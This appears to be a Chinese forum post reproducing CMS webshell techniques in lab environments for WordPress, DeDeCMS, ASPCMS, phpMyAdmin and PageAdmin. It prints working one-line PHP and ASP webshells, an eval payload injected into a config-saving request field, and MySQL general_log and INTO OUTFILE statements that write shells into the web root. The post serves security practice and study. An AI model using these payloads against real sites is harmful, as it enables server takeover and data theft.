ToB企服应用市场:ToB评测及商务社交产业平台

标题: CMS-GetShell漏洞复现 [打印本页]

---

作者: 金歌    时间: 2024-9-14 07:54
标题: CMS-GetShell漏洞复现
一：WordPress

环境

使用虚拟机为centos7.6
确保docker与docker-compose已安装(如果有需要大概有时间，会做一篇安装流程)

下载靶场git clone https://github.com/vulhub/vulhub.git(我这里已经下载，不再演示)
进入 /vulhub/wordpress/pwnscriptum 目次下；使用命令docker-compose up -d 开启环境

如果启动失败，vim docker-compose.yml修改

将上面改为2.1，下面为端口自己随便选择一个未占用即可

 启动成功

方法一：配景修改模板获取shell

访问虚拟机ip加上wp-sadmin进入，进入外观-编辑-404php，在第一行添加<?php phpinfo(); ?>
在下面点击更新文件(获取shell传入一句话木马，演示使用探针)

拼接路径访问/wp-content/themes/twentyfifteen/404.php

方法二：上传主题获取shell

点击外观-主题，然后添加上传主题，在网上随便下载一个wordpress主题，将传入php与主题一同压缩为zip上传，安装

安装成功后，拼接访问/wp-content/themes/加上上传文件以及php文件

我上传为一句话木马，使用蚁剑测试连接成功

二：DeDeCMS

下载文件解压到小皮面板www目次下(需要文件可以私信)，安装后拼接访问/uploads/dede

方法一：通过⽂件管理器上传获取shell

登录配景后，在核心-文件式管理器，点击文件上传上传一句话木马

测试连接，成功

方法二：修改模板文件获取shell

点击模板-默认模板管理，找到index.htm，修改保存

来到天生，更新主页HTML，看到主页模板没问题，天生静态，更新，欣赏

方法三：配景任意命令执⾏获取Shell

来到模块，广告管理，增加广告，将上传木马写入广告内容当中保存

添加成功后，点击代码查看位置，来到蚁剑测试连接

方法四：sql写入获取shell

来到体系，sql命令行工具，输入语句指定文件天生位置，点击确定，查看

留意：使用into outfile需要mysql中my.ini中有secure_file_priv=''

三：ASPCMS

环境

下载文件，搭建在有IIS服务机器上(我使用虚拟机Windows Server 2012搭建环境)

将文件解压后，配置在IIS网站下(需要详细环境搭建流程私信，大概有时间会写)

拼接路径/admin_aspcms，访问登录

配景修改配置⽂件获取Shell

进入后点击拓展功能->幻灯片设置->保存，用BP举行抓包

修改包中slideTextStatus 字段的值为1%25><%25Eval(Request (chr(65)))%25><%25，放完包，使用参数为chr(65)，参数为a

影响的文件为/config/AspCms_Config.asp，打开后可发现已经添加，使用蚁剑连接

四：PHPMyadmin

环境

使用小皮面板，来到软件管理找到phpmyadmin安装，安装完成后点击管理直接打开安装

方法一：通过⽇志⽂件拿Shell

登录后，点击sql输入以下语句执行

1. show global variables like '%general%';

复制代码

发现日志保存状态未开启

输入以下语句执行，开启日志保存状态

1. set global general_log='on';

复制代码

再次查看状态，已经开启

使用命令更改日志保存位置，查看是否成功

1. set global general_log_file = 'E:/phpStudy/phpstudy_pro/WWW/1.php'

复制代码

使用语句将木马写入，使用蚁剑测试连接

1. select '<?php eval($_POST["cmd"]);?>';

复制代码

方法二：导⼊导出获取Shell

通过sql语句判断目次，使用into outfile写入(使用条件看DeDeCMS方法四)
判断mysql位置使用命令

1. select @@datadir

复制代码

www路径应当为E:/phpStudy/phpstudy_pro/www若不精确，举行删减判断，写入木马

1. select "<?php eval($_POST[a]);?>" into outfile 'E:/phpStudy/phpstudy_pro/www/2.php';

复制代码

执行成功代表路径判断精确(包管目次下没有同名文件，否则会报错)，蚁剑连接

方法三：界面图像化获取Shell

如果第一种方法无法使用into outfile时，通过此方法修改日志举行sql写入木马
点击变量，搜索输入gen来搜索日志

sql写入，蚁剑连接

1. select "<?php eval($_POST[a]);?>";

复制代码

Pageadmin

环境同ASPCMS一样，下载安装于IIS，安装后，拼接admin，进入管理员页面

 

方法一：上传模块得到Shell

来到应用，插件安装上传一个含有木马的zip，若为授权版本会上传成功主动解压，直接连接即可

方法二：上传⽂件解压拿WebShell 

来到工具，文件管理上传带有一句话木马的zip，留意使用一句话木马为asp格式，内容为
 <%eval request("pass")%>

1. <%eval request("pass")%>

复制代码

找到后解压，使用蚁剑连接

 此漏洞复现结束，如有疑问或是问题提出欢迎讨论

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4